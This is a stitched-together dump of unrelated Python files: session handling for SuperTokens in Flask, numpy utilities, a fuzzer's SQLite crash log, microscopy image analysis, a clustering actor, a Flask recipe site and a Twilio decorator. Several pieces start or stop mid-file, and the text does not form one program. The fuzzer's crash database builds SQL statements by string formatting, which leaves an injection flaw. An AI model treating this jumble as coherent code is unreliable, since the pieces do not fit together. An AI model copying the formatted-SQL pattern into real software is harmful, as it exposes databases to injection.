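    for key in ("web", "api", "git"):
        ips.extend(meta.get(key, []))
    return ",".join(ips)

def upload_ip_list(bucket: str, key: str = "ips") -> None:
    # Store the list as a small S3 object for the GitPull lambda to read
    boto3.client("s3").put_object(Bucket=bucket, Key=key, Body=collect_webhook_ips().encode())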
You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. """ from supertokens_flask.constants import ( HOSTS_CONFIG, API_CONFIG, ACCESS_TOKEN_PATH_CONFIG, REFRESH_TOKEN_PATH_CONFIG, COOKIE_DOMAIN_CONFIG, COOKIE_SECURE_CONFIG, COOKIE_SAME_SITE_CONFIG ) from supertokens_flask.exceptions import ( raise_try_refresh_token_exception, raise_unauthorised_exception, SuperTokensTokenTheftError, SuperTokensUnauthorisedError, SuperTokensTryRefreshTokenError, ) from supertokens_flask.session import Session from flask import request, make_response from supertokens_flask import session_helper from supertokens_flask.cookie_and_header import ( CookieConfig, clear_cookies, get_anti_csrf_header, attach_anti_csrf_header, set_options_api_headers, get_access_token_from_cookie, attach_access_token_to_cookie, get_refresh_token_from_cookie, attach_refresh_token_to_cookie, save_frontend_info_from_request, get_id_refresh_token_from_cookie, attach_id_refresh_token_to_cookie_and_header, get_cors_allowed_headers as get_cors_allowed_headers_from_cookie_and_headers ) from supertokens_flask.default_callbacks import ( default_unauthorised_callback, default_try_refresh_token_callback, default_token_theft_detected_callback ) def create_new_session(response, user_id, jwt_payload=None, session_data=None): session = session_helper.create_new_session( user_id, jwt_payload, session_data) access_token = session['accessToken'] refresh_token = session['refreshToken'] id_refresh_token = session['idRefreshToken'] attach_access_token_to_cookie( response, access_token['token'], access_token['expiry'], access_token['domain'] if 'domain' in access_token else None, access_token['cookiePath'], access_token['cookieSecure'], access_token['sameSite'] ) attach_refresh_token_to_cookie( response, refresh_token['token'], refresh_token['expiry'], refresh_token['domain'] if 'domain' in refresh_token else None, refresh_token['cookiePath'], refresh_token['cookieSecure'], refresh_token['sameSite'] ) attach_id_refresh_token_to_cookie_and_header( response, id_refresh_token['token'], id_refresh_token['expiry'], id_refresh_token['domain'] if 'domain' in id_refresh_token else None, id_refresh_token['cookiePath'], id_refresh_token['cookieSecure'], id_refresh_token['sameSite'] ) if 'antiCsrfToken' in session and session['antiCsrfToken'] is not None: attach_anti_csrf_header(response, session['antiCsrfToken']) return Session(access_token['token'], session['session']['handle'], session['session']['userId'], session['session']['userDataInJWT'], response) def get_session(response, enable_csrf_protection): save_frontend_info_from_request(request) id_refresh_token = get_id_refresh_token_from_cookie(request) if id_refresh_token is None: clear_cookies(response) raise_unauthorised_exception('id refresh token is missing in cookies') access_token = get_access_token_from_cookie(request) if access_token is None: raise_try_refresh_token_exception('access token missing in cookies') try: anti_csrf_token = get_anti_csrf_header(request) new_session = session_helper.get_session(access_token, anti_csrf_token, enable_csrf_protection) if 'accessToken' in new_session: access_token = new_session['accessToken']['token'] session = Session(access_token, 
new_session['session']['handle'], new_session['session']['userId'], new_session['session']['userDataInJWT'], response) if 'accessToken' in new_session: if response is not None: access_token_info = new_session['accessToken'] attach_access_token_to_cookie( response, access_token_info['token'], access_token_info['expiry'], access_token_info['domain'] if 'domain' in access_token_info else None, access_token_info['cookiePath'], access_token_info['cookieSecure'], access_token_info['sameSite'] ) else: session.new_access_token_info = new_session['accessToken'] return session except SuperTokensUnauthorisedError as e: clear_cookies(response) raise e def refresh_session(response): save_frontend_info_from_request(request) refresh_token = get_refresh_token_from_cookie(request) if refresh_token is None: clear_cookies(response) raise_unauthorised_exception('Missing auth tokens in cookies. Have you set the correct refresh API path in ' 'your frontend and SuperTokens config?') try: anti_csrf_token = get_anti_csrf_header(request) new_session = session_helper.refresh_session(refresh_token, anti_csrf_token) access_token = new_session['accessToken'] refresh_token = new_session['refreshToken'] id_refresh_token = new_session['idRefreshToken'] session = Session(access_token['token'], new_session['session']['handle'], new_session['session']['userId'], new_session['session']['userDataInJWT'], response) if response is not None: attach_access_token_to_cookie( response, access_token['token'], access_token['expiry'], access_token['domain'] if 'domain' in access_token else None, access_token['cookiePath'], access_token['cookieSecure'], access_token['sameSite'] ) attach_refresh_token_to_cookie( response, refresh_token['token'], refresh_token['expiry'], refresh_token['domain'] if 'domain' in refresh_token else None, refresh_token['cookiePath'], refresh_token['cookieSecure'], refresh_token['sameSite'] ) attach_id_refresh_token_to_cookie_and_header( response, id_refresh_token['token'], id_refresh_token['expiry'], id_refresh_token['domain'] if 'domain' in id_refresh_token else None, id_refresh_token['cookiePath'], id_refresh_token['cookieSecure'], id_refresh_token['sameSite'] ) if 'antiCsrfToken' in new_session and new_session['antiCsrfToken'] is not None: attach_anti_csrf_header(response, new_session['antiCsrfToken']) else: session.new_access_token_info = access_token session.new_refresh_token_info = refresh_token session.new_id_refresh_token_info = id_refresh_token if 'antiCsrfToken' in new_session and new_session['antiCsrfToken'] is not None: session.new_anti_csrf_token = new_session['antiCsrfToken'] return session except (SuperTokensTokenTheftError, SuperTokensUnauthorisedError) as e: clear_cookies(response) raise e def revoke_session(session_handle): return session_helper.revoke_session(session_handle) def revoke_all_sessions_for_user(user_id): return session_helper.revoke_all_sessions_for_user(user_id) def get_all_session_handles_for_user(user_id): return session_helper.get_all_session_handles_for_user(user_id) def revoke_multiple_sessions(session_handles): return session_helper.revoke_multiple_sessions(session_handles) def get_session_data(session_handle): return session_helper.get_session_data(session_handle) def update_session_data(session_handle, new_session_data): session_helper.update_session_data(session_handle, new_session_data) def get_jwt_payload(session_handle): return session_helper.get_jwt_payload(session_handle) def update_jwt_payload(session_handle, new_jwt_payload): 
session_helper.update_jwt_payload(session_handle, new_jwt_payload) def set_relevant_headers_for_options_api(response): set_options_api_headers(response) def get_cors_allowed_headers(): return get_cors_allowed_headers_from_cookie_and_headers() class SuperTokens: def __init__(self, app): self.__unauthorised_callback = default_unauthorised_callback self.__try_refresh_token_callback = default_try_refresh_token_callback self.__token_theft_detected_callback = default_token_theft_detected_callback hosts = app.config.setdefault(HOSTS_CONFIG, None) api_key = app.config.setdefault(API_CONFIG, None) access_token_path = app.config.setdefault(ACCESS_TOKEN_PATH_CONFIG, None) refresh_token_path = app.config.setdefault(REFRESH_TOKEN_PATH_CONFIG, None) cookie_domain = app.config.setdefault(COOKIE_DOMAIN_CONFIG, None) cookie_secure = app.config.setdefault(COOKIE_SECURE_CONFIG, None) cookie_same_site = app.config.setdefault(COOKIE_SAME_SITE_CONFIG, None) session_helper.init(hosts, api_key) CookieConfig.init(access_token_path, refresh_token_path, cookie_domain, cookie_secure, cookie_same_site) self.__set_error_handler_callbacks(app) def __set_error_handler_callbacks(self, app): @app.errorhandler(SuperTokensUnauthorisedError) def handle_unauthorised(e): response = make_response(self.__unauthorised_callback(e)) clear_cookies(response) return response @app.errorhandler(SuperTokensTryRefreshTokenError) def handle_try_refresh_token(e): response = make_response(self.__try_refresh_token_callback(e)) return response @app.errorhandler(SuperTokensTokenTheftError) def handle_token_theft(e): response = make_response( self.__token_theft_detected_callback( e.session_handle, e.user_id)) clear_cookies(response) return response def set_unauthorised_error_handler(self, callback): self.__unauthorised_callback = callback def set_try_refresh_token_error_handler(self, callback): self.__try_refresh_token_callback = callback def set_token_theft_detected_error_handler(self, callback): self.__token_theft_detected_callback = callback PRIORITY_CHOICE = ( ('low','LOW'), ('medium','Medium'), ('high','High'), ) RESOLVE_CHOICE = ( ('open','Open'), ('in_progress','In-progress'), ('review','Review'), ('cancelled','Cancelled'), ('done','Done'), ) USER_TYPE_CHOICE = ( ('admin','Admin'), ('employee','Employee'), ('student','Student'), ('admission_officer','Admission Officer'), ('register_offier','Register Offier'), )Borsos/rubikrubik/cubes/utilities.py #!/usr/bin/env python3 # # Copyright 2014 # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # __author__ = "" __all__ = [ 'precise_sum', 'precise_mean', 'interpolate_filename', ] import numpy as np import random from .dtypes import best_precise_dtype, get_dtype from ..shape import Shape def precise_sum(cube, axis=None, dtype=None, out=None, keepdims=False): """precise_sum(cube, axis=None, dtype=None, out=None, keepdims=False) -> precise sum of cube This is a replacement of numpy.sum; if dtype is None, the best precise dtype is used. 
""" if dtype is None: dtype = best_precise_dtype(cube.dtype) return np.sum(a=cube, axis=axis, dtype=dtype, out=out, keepdims=keepdims) def precise_mean(cube, axis=None, dtype=None, out=None, keepdims=False): """precise_mean(cube, axis=None, dtype=None, out=None, keepdims=False) -> precise mean of cube This is a replacement of numpy.mean; if dtype is None, the best precise dtype is used. """ if dtype is None: dtype = best_precise_dtype(cube.dtype) return np.mean(a=cube, axis=axis, dtype=dtype, out=out, keepdims=keepdims) def interpolate_filename(filename, shape, dtype, file_format, keywords=None): if file_format is None: file_format = DEFAULT_FILE_FORMAT dtype = get_dtype(dtype) if keywords is None: keywords = {} count = 0 if shape: count = 1 for i in shape: count *= i else: count = 0 if not isinstance(shape, Shape): shape = Shape(shape) return filename.format( shape=shape, rank=len(shape), count=count, format=file_format, dtype=dtype.__name__, **keywords ) # # BrundleFuzz server side database operations # SQLite is beautiful # import sqlite3 as sqlite import sys class CrashDataBase(object): """ Some convenience wrappers for the SQLite database operations """ def __init__(self, parent): """ Simplicity is better than complexity """ self.parent = parent self.ae = parent.ae self.cfg = parent.cfg try: self.con = sqlite.connect('fuzz.db') self.cur = self.con.cursor() self.cur.executescript(""" CREATE TABLE IF NOT EXISTS Crashes ( \ Id INTEGER PRIMARY KEY, \ NodeId TEXT, \ Machine TEXT, \ Cpu TEXT, \ Victim TEXT, \ EventName TEXT, \ Ip TEXT, \ Exploitable TEXT, \ FileName TEXT); """) self.con.commit() self.ae.m_ok('Database initialized successfully :)') except sqlite.Error, e: if self.con: self.con.rollback() self.ae.m_fatal("Error: %s" % e.args[0]) sys.exit(1) def write_crash(self, crash_properties): """ Process data to a format suitable for storage in the SQLite database """ node_id = crash_properties['node_id'] machine = crash_properties['machine'] cpu = crash_properties['cpu'] victim_pathname = crash_properties['victim'] event_name = crash_properties['event_name'] ip = crash_properties['ip'] exp = crash_properties['exploitability'] filename = crash_properties['filename'] victim_filename = victim_pathname.split('\\')[-1] self.cur.execute("INSERT INTO Crashes(NodeId, Machine, Cpu, Victim, EventName, Ip, Exploitable, FileName) \ VALUES('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s');" % (node_id, machine, cpu, victim_filename, event_name, ip, exp, filename)) self.con.commit() def retrieve_crashes(self): """ Gets all crash information :return: iterator of tuples """ self.cur.execute("SELECT * FROM Crashes") rows = self.cur.fetchall() return rows ChunjunHu/SemanticSegmentationofCropRemoteSensingBasedonDeepLearning1-10 ''' Author : now more Connect : LastEditors : now more Description : build_transforms LastEditTime: 2019-07-06 20:07:26 ''' from .build import * exercises/w.py def next(p): f = False if p == 2: p = 1 while not f: p += 2 f = True for i in range(2, p): if p%i == 0: f = False return p def primeFactorization(num): p = 2 r = list() while num != 0: d, m = divmod(num, p) print(d, m, p) if m == 0: num = d r.append(p) elif d == 0: num = 0 else: p = next(p) return r def lcm(nums): l = 1 ns = nums[:] d = False while not d: m = min(ns) l *= m ns.remove(m) d = True for x in nums: print(x, l%x) if l % x != 0: d = False break return l examples/kristen_support.py import csv import logging as logger import os from _csv import writer as csv_writer from collections import defaultdict import numpy as np 
from matplotlib import pyplot as plt from scipy import ndimage as ndi, stats import imagepipe.raw_functions import imagepipe.tools.helpers import imagepipe.wrapped_functions import imagepipe.core_functions from imagepipe import core_functions as cf, density_plot from imagepipe.core_functions import generator_wrapper @generator_wrapper(in_dims=2,out_dims=(None,)) def Kristen_render_single_image(dapi, gfp, mcherry): plt.figure(figsize=(26.0, 15.0)) plt.title('Max Projection') plt.subplot(221) plt.title('DAPI') plt.imshow(dapi,interpolation='nearest') plt.subplot(222) plt.title('GFP') plt.imshow(gfp, interpolation='nearest') plt.subplot(221) plt.title('mCherry') plt.imshow(mcherry, interpolation='nearest') @generator_wrapper(in_dims=(None,None, 2, 2, 3, 3), out_dims=(None,)) def Kristen_render(name_pattern, group_id, mCherry, extranuclear_mCherry_pad, GFP_orig, mCherry_orig, output, save=False, directory_to_save_to='verification'): labels, _ = ndi.label(extranuclear_mCherry_pad) unique_segmented_cells_labels = np.unique(labels)[1:] mCherry_cutoff = np.zeros_like(mCherry) qualifying_cell_label = [] qualifying_regression_stats = [] for cell_label in unique_segmented_cells_labels: mCherry_2 = np.zeros_like(mCherry) my_mask = labels == cell_label average_apply_mask = np.mean(mCherry[my_mask]) intensity = np.sum(mCherry[my_mask]) binary_pad = np.zeros_like(mCherry) binary_pad[my_mask] = 1 pixel = np.sum(binary_pad[my_mask]) if (average_apply_mask > .05 or intensity > 300) and pixel > 4000: GFP_limited_to_cell_mask = imagepipe.raw_functions.f_3d_stack_2d_filter(GFP_orig, my_mask) mCherry_limited_to_cell_mask = imagepipe.raw_functions.f_3d_stack_2d_filter(mCherry_orig, my_mask) qualifying_3d_GFP = GFP_limited_to_cell_mask[mCherry_limited_to_cell_mask>50] average_3d_GFP = np.mean(qualifying_3d_GFP) median_3d_GFP = np.median(qualifying_3d_GFP) std_3d_GFP = np.std(qualifying_3d_GFP) sum_qualifying_GFP = np.sum(qualifying_3d_GFP) nonqualifying_3d_GFP = GFP_limited_to_cell_mask[mCherry_limited_to_cell_mask<=50] average_nonqualifying_3d_GFP = np.mean(nonqualifying_3d_GFP) median_nonqualifying_3d_GFP = np.median(nonqualifying_3d_GFP) std_nonqualifying_3d_GFP = np.std(nonqualifying_3d_GFP) sum_nonqualifying_GFP = np.sum(nonqualifying_3d_GFP) sum_total_GFP = sum_qualifying_GFP + sum_nonqualifying_GFP percent_qualifying_over_total_GFP = sum_qualifying_GFP/sum_total_GFP # report the percentage too or sums are sufficient? 
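# A stripped-down sketch of the per-cell analysis above: label a binary mask and,
# for each labelled region that is large enough, regress mCherry intensity on GFP
# over the voxels that pass an intensity cutoff.  The 2-d arrays, the cutoff of 50
# and the size threshold are placeholders mirroring the snippet above.
import numpy as np
from scipy import ndimage as ndi, stats

def per_cell_stats(binary_mask, mcherry, gfp, cutoff=50, min_pixels=4000):
    labels, n_labels = ndi.label(binary_mask)   # label 0 is background
    results = {}
    for cell_label in range(1, n_labels + 1):
        cell = labels == cell_label
        if np.count_nonzero(cell) < min_pixels:
            continue  # mirror the size cutoff used above
        qualifying = cell & (mcherry > cutoff)
        if np.count_nonzero(qualifying) < 2:
            continue  # linregress needs at least two points
        slope, _, r, p, _ = stats.linregress(gfp[qualifying], mcherry[qualifying])
        results[cell_label] = {
            "mean_gfp": float(np.mean(gfp[qualifying])),
            "sum_gfp": float(np.sum(gfp[qualifying])),
            "slope": slope,
            "r2": r ** 2,
            "p_value": p,
        }
    return results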
GFP_orig_qualifying = imagepipe.raw_functions.f_3d_stack_2d_filter(GFP_orig, my_mask) mCherry_orig_qualifying = imagepipe.raw_functions.f_3d_stack_2d_filter(mCherry_orig, my_mask) mCherry_1d = mCherry_orig_qualifying[mCherry_orig_qualifying > 50] GFP_1d = GFP_orig_qualifying[mCherry_orig_qualifying>50] regression_results = stats.linregress(GFP_1d, mCherry_1d) mCherry_2[my_mask] = mCherry[my_mask] mCherry_cutoff[my_mask] = mCherry[my_mask] qualifying_cell_label.append(cell_label) qualifying_regression_stats.append((regression_results[0], regression_results[2], regression_results[3])) name_pattern_split = name_pattern.split(' - ') transfection_label = name_pattern_split[0] cell_type = name_pattern_split[1] exp_time = name_pattern_split[2] image_number = name_pattern_split[4] with open(output, 'ab') as output_file: writer = csv_writer(output_file, delimiter='\t') writer.writerow([transfection_label, cell_type, exp_time, image_number, cell_label, sum_qualifying_GFP, sum_total_GFP, average_3d_GFP, median_3d_GFP, std_3d_GFP, average_nonqualifying_3d_GFP, median_nonqualifying_3d_GFP, std_nonqualifying_3d_GFP, regression_results[0], regression_results[2], regression_results[3]]) plt.figure(figsize=(26.0, 15.0)) plt.title('Kristen\'s Data') plt.suptitle(name_pattern) main_ax = plt.subplot(221) plt.subplot(221, sharex=main_ax, sharey=main_ax) plt.title('mCherry Binary') im = plt.imshow(extranuclear_mCherry_pad, interpolation='nearest', cmap = 'hot') plt.colorbar(im) plt.subplot(222, sharex=main_ax, sharey=main_ax) plt.title('mCherry') plt.imshow(mCherry, interpolation='nearest') plt.contour(extranuclear_mCherry_pad, [0.5], colors='k') plt.subplot(223) plt.better2D_desisty_plot(GFP_1d, mCherry_1d) plt.title('mCherry Intensity as a Function of GFP Voxel') plt.xlabel('GFP Voxel') plt.ylabel('mCherry Intensity') plt.subplot(224, sharex=main_ax, sharey=main_ax) plt.title('mCherry-cutoff applied') plt.imshow(mCherry_2, interpolation='nearest') if not save: plt.show() else: name_puck = directory_to_save_to + '/' + 'Kristen-' + name_pattern+ '_cell' + str(cell_label)+ '.png' plt.savefig(name_puck) plt.close() plt.figure(figsize=(26.0, 15.0)) main_ax = plt.subplot(121) plt.subplot(121, sharex=main_ax, sharey=main_ax) plt.suptitle('mCherry Before and After Qualifying Cell Cutoff is Applied') plt.title('mCherry') im = plt.imshow(mCherry, interpolation='nearest') plt.colorbar(im) plt.subplot(122, sharex=main_ax, sharey=main_ax) plt.title('mCherry') plt.imshow(mCherry_cutoff, interpolation='nearest') if not save: plt.show() else: name_puck = directory_to_save_to + '/' + 'Kristen-' + name_pattern + 'cutoff_app' + '.png' plt.savefig(name_puck) plt.close() return qualifying_regression_stats @generator_wrapper(in_dims=(None, 0, 0, 0, 0, 0, 0, 0, 0, 0 ), out_dims=(None,)) def Kristen_summarize_a(name_pattern, q_mean,q_median, q_std, nq_mean, nq_median, nq_std, slope, r2, p, output): with open(output, 'ab') as output_file: # csv_read = csv.res writer = csv_writer(output_file, delimiter = '\t') for i in name_pattern: writer.writerow([i, q_mean, q_median, q_std, nq_mean, nq_median, nq_std, slope, r2, p]) def Kristen_traverse(main_root, matching_rule='c', matching_map=None): print "starting kristen's traversal" matched_images = defaultdict(lambda: [''] * len(matching_map)) # name_pattern_list = [] if matching_rule: assert (matching_map is not None) for current_location, sub_directories, files in os.walk(main_root): if files: for img in files: if ('.TIF' in img or '.tif' in img) and '_thumb_' not in img: prefix = 
imagepipe.raw_functions.split_and_trim(current_location, main_root) img_codename = [img.split('.')[0]] # # choosing one image to work with # c = img_codename[0].split('-')[0] # b = img_codename[0].split(' ')[-1][0] # print c # print b # if c == 'C1' and b[0] == 'B': # # change these conditions back to original to test all images # print "found image" # # name_pattern = ' - '.join(prefix + img_codename[0].split(' ')[1:]) # group_by = img_codename[0][:2] # color = matching_map[img_codename[0].split('-')[0]] # # print matched_images[name_pattern][color] # # print os.path.join(current_location, img) # matched_images[name_pattern][color] = os.path.join(current_location, img) name_pattern = ' - '.join(prefix + img_codename[0].split(' ')[1:]) group_by = img_codename[0][:2] color = matching_map[img_codename[0].split('-')[0]] # print matched_images[name_pattern][color] # print os.path.join(current_location, img) matched_images[name_pattern][color] = os.path.join(current_location, img) # shift tab upper portion out/ placed inside for loop to study a single image but originally only inside the if(.TIF...) delset = [] for name_pattern, (color_set) in matched_images.iteritems(): # debugger.logger.debug(color_set) if any([color == '' for color in color_set]): logger.info('in %s, colorset is broken:', name_pattern) for color_name in color_set: logger.info('\t %s', color_name) logger.info('name_pattern will be deleted') delset.append(name_pattern) for name_pattern in delset: del matched_images[name_pattern] user_input_about_new_csv_file = raw_input("To continue, enter 2. To start the process from the beginning, enter 1") if user_input_about_new_csv_file == '1': print "Preparing a new CSV file" initial_open = open("matched_images.csv", 'wb') # this is the file we need to save unless user provides input saying we can override it writer = csv.writer(initial_open, delimiter='\t') for key in matched_images: writer.writerow([key] + matched_images[key] + [0]) initial_open.close() else: print "Continuing where the process last left off" file_exists = os.path.isfile("matched_images.tmp") if file_exists: open_tmp = open('matched_images.tmp', 'r') read_preexisting_tmp = csv.reader(open_tmp, delimiter='\t') tmp_list = [] for row in read_preexisting_tmp: tmp_list.append(row) open_tmp.close() open_csv = open('matched_images.csv', 'r') read_preexisting_csv = csv.reader(open_csv, delimiter='\t') csv_list = [] for row in read_preexisting_csv: csv_list.append(row) open_csv.close() for csv_row in csv_list: for tmp_row in tmp_list: if csv_row[0] == tmp_row[0]: csv_row[3] = tmp_row[3] open_csv_write = open('matched_images.csv', 'wb') override_csv = csv.writer(open_csv_write, delimiter='\t') for new_csv_row in csv_list: override_csv.writerow(new_csv_row) open_updated_csv_to_read = open('matched_images.csv', 'rb') csv_reader = csv.reader(open_updated_csv_to_read, delimiter='\t') open_tmp_to_write = open("matched_images.tmp", 'wb') writer_check_tmp = csv.writer(open_tmp_to_write, delimiter='\t') for row in csv_reader: name_pattern = row[0] color_set = [row[1], row[2], row[3]] if row[3] == 1: writer_check_tmp.writerow(row) continue channels = [] plot_list = [] for color in color_set: channels.append(imagepipe.tools.helpers.tiff_stack_2_np_arr(color)) plot_list.append(imagepipe.tools.helpers.tiff_stack_2_np_arr(color)) # plt.figure(figsize=(20.0, 15.0)) # plt.suptitle('Projected DAPI. 
GFP, mCherry') # plt.title('DAPI') # dapi = np.max(plot_list[0], axis=0) # plt.imshow(dapi, interpolation='nearest', cmap='gray') # plt.title('GFP') # gfp = np.max(plot_list[1], axis=0) # plt.imshow(gfp, interpolation='nearest', cmap='gray') # mcherry = np.max(plot_list[2], axis=0) # plt.imshow(mcherry, interpolation='nearest', alpha=0.3) # plt.show() yield name_pattern, matched_images, channels row[3] = 1 writer_check_tmp.writerow(row)#! /usr/bin/python2 # -*- coding: utf8 -*- import pykka import time from sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer from sklearn.pipeline import Pipeline from sklearn.cluster import SpectralClustering, AffinityPropagation from datetime import datetime class Learner(pykka.ThreadingActor): """Fetch friends and tweets for a given ego """ def __init__(self, k=20): super(Learner, self).__init__() self.token_processer = Pipeline([('vect', CountVectorizer()), \ ('tfidf', TfidfTransformer()) ]) self.k = k # number of clusters self.clf = SpectralClustering(n_clusters=k, random_state=42, \ affinity='rbf', n_neighbors=15, eigen_tol=0.0) def learn(self, data): # u_ids = [] u_screen_names = [] X = [] def insert(elem): # u_ids.append(elem['u_id']) u_screen_names.append(elem['u_screen_name']) X.append(elem['u_document']) [insert(elem) for elem in data] # Create bag of words representation X = self.token_processer.fit_transform(X) labels = self.clf.fit_predict(X) clustering = [[] for i in range(self.k)] ## Fast loop: # [ clustering[labels[i]].append(u_id) for i, u_id in enumerate(u_ids) ] [ clustering[labels[i]].append(u_scr_n) for i, u_scr_n in enumerate(u_screen_names) ] return {'ego_id':data[0]['ego_id'], "nb_clusters":self.k, 'clustering':clustering, "created_at":str(datetime.now())}Mascarpone/Re71-10 # -*- coding: utf-8 -*- from project import app, gallery from flask import request, render_template, redirect, url_for, abort, flash, jsonify from project.model.default import model from project.model.forms import RecipeForm, CommentForm, ContainForm, SearchForm from wtforms import FormField, TextAreaField, FieldList, validators from flask.ext.login import current_user, login_required from werkzeug import secure_filename from flask.ext.uploads import UploadNotAllowed import math @app.route('/recipes', methods=('GET', 'POST')) @app.route('/recipes/', methods=('GET', 'POST')) def recipes(category=None): max = model.getMaxBudget() max = int(math.ceil(max['MAX(budget)'])) min = model.getMinBudget() min = int(math.floor(min['MIN(budget)'])) form = SearchForm(csrf_enabled=False) if category is not None: form.categories.data = [category] recipes = model.getRecipesSearch(form.data['minprice'], form.data['maxprice'], form.data['ingredients'], form.data['categories'], form.data['query']) images = {} averages = {} for recipe in recipes: image = gallery.url(recipe['image']) if not recipe['image']: image += 'recipe.png' images[recipe['recipeID']] = image averages[recipe['recipeID']] = model.getAverageByRecipeID(recipe['recipeID']) return render_template('recipes.html', form=form, recipes=recipes, images=images, averages=averages, max=max, min=min) @app.route('/recipes/recipe/', methods=('GET', 'POST')) def recipe(id): recipe = model.getRecipe(id) if recipe is not None: form = CommentForm() if form.validate_on_submit(): if current_user.is_authenticated: comment = model.getCommentsByRecipeIDAndUserID(id, current_user.get_id()) if comment is None: model.insertComment(form.comment.data, form.tasteScore.data, form.priceScore.data, form.instructionScore.data, 
current_user.get_id(), id) else: flash(u"Vous avez déjà commenté cette recette") return redirect(url_for('recipe', id=id)) else : flash(u"Connectez-vous pour pouvoir commenter les recettes") return redirect(url_for('login')) steps = model.getStepsByRecipeID(id) image = gallery.url(recipe['image']) ingredients = model.getContainsByRecipeID(id) comments = model.getCommentsByRecipeID(id) averages = model.getAverageByRecipeID(id) if not recipe['image']: image += 'recipe.png' return render_template('recipe.html', recipe=recipe, steps=steps, image=image, ingredients=ingredients, form=form, comments=comments, averages=averages) return abort(404) @app.route('/recipes/create', methods=('GET', 'POST')) @login_required def createRecipe(): form = RecipeForm(csrf_enabled=False) ingredients = [i['ingredientName'] for i in model.getIngredients()] if form.validate_on_submit(): if form.image.data.filename: try: filename = gallery.save(form.image.data) except UploadNotAllowed: flash(u"Le format d'image n'est pas autorisé.") else: filename = '' recipeID = model.insertRecipe(form.recipeName.data, filename, form.budget.data, form.difficulty.data, form.preparationTime.data, form.cookingTime.data, current_user.get_id(), form.categoryID.data) for contain in form.contains.data: ingredient = model.getIngredientByName(contain['ingredientName']) if ingredient is not None: ingredientID = ingredient['ingredientID'] else: ingredientID = model.insertIngredient(contain['ingredientName']) model.insertContain(recipeID, ingredientID, contain['quantity'], contain['isMain'], contain['unitID'] ) for i, step in enumerate(form.steps.data): model.insertStep(i+1, step, recipeID) return redirect(url_for('recipe', id=recipeID)) return render_template('createRecipe.html', form=form, ingredients=ingredients) @app.route('/recipes/edit/', methods=('GET', 'POST')) @login_required def editRecipe(id): recipe = model.getRecipe(id) if recipe is not None: if recipe['userID'] == int(current_user.get_id()): ingredients = [i['ingredientName'] for i in model.getIngredients()] form = RecipeForm(csrf_enabled=False) choices = { c[0] : c[1] for c in form.contains.entries[0].form.unitID.choices} #assert False if form.validate_on_submit(): model.updateRecipe(id, form.recipeName.data, form.budget.data, form.difficulty.data, form.preparationTime.data, form.cookingTime.data, form.categoryID.data) for i, step in enumerate(form.steps.data): model.updateStep(i+1, step, id) for contain in form.contains.data: ingredient = model.getIngredientByName(contain['ingredientName']) ingredientID = ingredient['ingredientID'] model.updateContain(id, ingredientID, contain['quantity'], contain['isMain'], contain['unitID'] ) return redirect(url_for('recipe', id=id)) steps = model.getStepsByRecipeID(id) image = gallery.url(recipe['image']) contains = model.getContainsByRecipeID(id) comments = model.getCommentsByRecipeID(id) averages = model.getAverageByRecipeID(id) form.recipeName.data = recipe['recipeName'] form.budget.data = recipe['budget'] form.difficulty.data = recipe['difficulty'] form.preparationTime.data = recipe['preparationTime'] form.cookingTime.data = recipe['cookingTime'] form.categoryID.data = recipe['categoryID'] form.contains.pop_entry() for contain in contains: containform = ContainForm() containform.isMain = contain['isMain'] containform.quantity = int(contain['quantity']) containform.unitID = contain['unitID'] containform.ingredientName = contain['ingredientName'] form.contains.append_entry(containform) for step in steps: 
form.steps.append_entry(step['stepDescription']) return render_template('editRecipe.html', form=form, ingredients=ingredients, id=id, choices=choices) return abort(404) @app.route('/recipes/delete/') @login_required def deleteRecipe(id): recipe = model.getRecipe(id) if recipe is not None: if recipe['userID'] == int(current_user.get_id()): if model.deleteRecipe(id) : flash(u'La recette {} a bien été supprimée.'.format(recipe['recipeName'])) else: flash(u"La recette {} n'a pas pu être supprimée.".format(recipe['recipeName'])) return redirect(url_for('manage')) return abort(404) # -*- coding: utf-8 -*- from __future__ import unicode_literals, absolute_import """ Useful decorators. """ from functools import wraps from django.conf import settings from django.views.decorators.csrf import csrf_exempt from django.http import ( HttpRequest, HttpResponse, HttpResponseForbidden, HttpResponseNotAllowed) from django.utils.six import text_type from twilio.twiml import TwiML as Verb from twilio.request_validator import RequestValidator from .settings import TWILIO_AUTH_TOKEN from .utils import get_blacklisted_response def twilio_view(f): """ This decorator provides several helpful shortcuts for writing Twilio views. - It ensures that only requests from Twilio are passed through. This helps protect you from forged requests. - It ensures your view is exempt from CSRF checks via Django's @csrf_exempt decorator. This is necessary for any view that accepts POST requests from outside the local domain (eg: Twilio's servers). - It enforces the blacklist. If you've got any ``Caller``s who are blacklisted, any requests from them will be rejected. - It allows your view to (optionally) return TwiML to pass back to Twilio's servers instead of building an ``HttpResponse`` object manually. - It allows your view to (optionally) return any ``twilio.Verb`` object instead of building a ``HttpResponse`` object manually. .. note:: The forgery protection checks ONLY happen if ``settings.DEBUG = False`` (aka, your site is in production). Usage:: from twilio import twiml @twilio_view def my_view(request): r = twiml.Response() r.message('Thanks for the SMS message!') return r """ @csrf_exempt @wraps(f) def decorator(request_or_self, *args, **kwargs): # When using `method_decorator` on class methods, # I haven't been able to get any class views. # i would like more research before just taking the check out. class_based_view = not isinstance(request_or_self, HttpRequest) if not class_based_view: request = request_or_self else: assert len(args) >= 1 request = args[0] # Turn off Twilio authentication when explicitly requested, or # in debug mode. Otherwise things do not work properly. For # more information, see the docs. 
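# The forgery check performed below boils down to recomputing Twilio's request
# signature and comparing it with the X-Twilio-Signature header.  A minimal
# standalone version of that check for a Django request is sketched here; the
# auth token value is a placeholder.
from twilio.request_validator import RequestValidator

def is_genuine_twilio_request(request, auth_token="placeholder-auth-token"):
    validator = RequestValidator(auth_token)
    signature = request.META.get("HTTP_X_TWILIO_SIGNATURE", "")
    params = request.POST if request.method == "POST" else request.GET
    # validate() re-signs the absolute URL plus the parameters and compares
    return validator.validate(request.build_absolute_uri(), params, signature)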
